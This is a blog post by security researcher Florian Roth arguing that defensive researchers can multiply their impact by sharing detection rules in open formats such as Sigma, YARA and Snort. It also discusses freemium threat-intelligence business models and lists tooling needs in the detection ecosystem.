Leverage is Key

Florian Roth
5 min readJun 7, 2020

Maximizing the effect of defensive research

We live in challenging times. As a security researcher focusing on threat detection I frequently notice and comment on the increasing use of off-the-shelf tools by nation state actors.

My team and I monitor that landscape closely and noticed an increase of tool publications or updates since the beginning of the COVID19 pandemic. We believe that this increase is caused by members of the offensive security research community confined to their homes, eager to develop, release and spend their time in a meaningful way.

I’ve exported statistics of elements in our internal rule generation stack tagged as “hacktool”. My team adds articles, samples, tweets, reports to that list every day. You can see that the number of elements tagged as “hacktool” has increased over the last 8 weeks. Sure, this is a subjective view as it also depends on my team’s attentiveness, but I’ve at least tried to underpin my impression with our internal collected data. I’d love to see statistics on releases of projects (new and major updates) in the “security” category on github over the last 6 months.

Number of tools dropped on our signature generation stack (by number of week in 2020)

Since passion for offensive research is usually deeply rooted in a personality, viewpoints, fields of activity and thus this situation cannot be changed overnight.

We, as defensive researchers, have to find ways to harness the same advantages of global collaboration to tackle the this spike in increased supply and spend our time in more effective ways.

Sharing Detection Ideas

Just like the offsec community, the community of defensive researchers has to improve the existing and find new starting points to maximize the effects of detection ideas that a single person has developed.

The demand for these methods has increased significantly over the last 10 years. Many standards, tools and frameworks stepped in to satisfy this demand. Snort, YARA, STIX, Sigma act as containers for descriptions that researchers can use to transport detection ideas or indicators.

John Lambert mentioned them as “Detection Definitions” in his great article on the “Githubification of InfoSec”. If you haven’t read John’s article yet, I recommend reading it, as it does a much better job explaining the benefits of shared detection definitions.

Githubification of InfoSec by John Lambert

With this post, I’d like to add some of my personal perspectives to it.

Free or Paid Content — Everything Helps

The great thing about free markets is that demand determines the price. The prices that customers are willing to pay for a good a service are an indicator of value to buyers. Our industry has an immense demand for detection definitions as well as supporting tools and services.

People would argue that we can only maximize the effect of detection ideas by sharing them openly and freely. Selling them in form of a feed, reports or package would reduce the number of receivers and thus wouldn’t exploit its full potential.

I‘d respond that there is a demand for both forms and often overlooked synergetic effects.

Companies that sell their detection logic have incentives to drive the adoption of open standards in commercial or free products as their customers can make use of these integrations to apply the detection rules.

Cisco is a good example for Snort, SOC Prime for Sigma, EclecticIQ for STIX and we as Nextron for YARA. We influence these standards, provide free content, open source tools or libraries and benefit from a wider adoption since we also sell curated content to extend the freely available one. It’s a win-win.

Commercial feed providers typically also have to provide proof that their rules are sound and useful. Some — not all — do this by providing free content or free demo access to their platforms.

I am a strong believer in the freemium model. The idea is: “Give away a good portion of your product for free and sell extras to customers with higher demands and bigger budgets”. In this constellation, we even create a win-win-win situation in which everyone benefits — supplier, buyers and users of the free content.

Creating Leverage

The reason for me to start the Sigma project with Thomas was a simple SIEM consulting project in 2016.

The task was to process a set of 10+ PDF documents, extract detection logic and describe them in form of chapters in a MS Word document including specific queries for the customer’s SIEM.

It wasn’t a very difficult task but I noticed that I lacked enthusiasm. The reason was that I’ve written similar documents before, for other customers and other SIEM systems. Spending so much time for a single SIEM query that would only work in that customers environment just felt wrong. There had to be a better way.

Therefore, Thomas and I created Sigma as an open standard to describe detection ideas in log data. It’s not very creative or ingenious. It was just something that we’d missed.

By being able to describe detection methods in a generic and shareable form, each invested hour can have a significantly bigger effect. A 1:1 relation suddenly becomes a 1:n relation, as people all over the world that receive your rules immediately get into a position to detect threats using it.

Even a small push can have a big impact using the right lever.

We have to spot opportunities, develop and use containers like YARA, Snort / Suricata or Sigma to maximize the effectiveness of our research.

Tweet mentioning different rule types to cover an threat group’s activity

Shifting the Spotlight

From now on, someone publishing a detection rule for an exploit gets the same applause as the guy who published the exploit. It’s even better — this applause comes from the right people only.

As I said our industry is in high demand for detection logic — but that isn’t all.

In order to make best use of it we also need:

  • Libraries for conversions
  • Importer and exporter
  • Automatic rule generators
  • Rule management
  • Rule testing and quality assurance
  • Curating services
  • Dashboards and correlations
  • Feed concentrators
  • Custom extensions to meet special needs
  • Rule rating and feedback systems
  • Automatic documentation
  • Duplicate and overlap detectors
  • Grouping and tagging to create rule sets
  • Demo environments and test data

Provide a service or tool to help people with these tasks and you can start a new defensive open source project or business.

Companies already offer so-called “threat bounties” (Polyswarm, SOCPrime) in which you get payed for providing detection rules or the detection itself. This could be an interesting opportunity for researchers that look for new ways to make money from home.

The challenges are endless, but so are the possibilities.

Follow me on Twitter or LinkedIn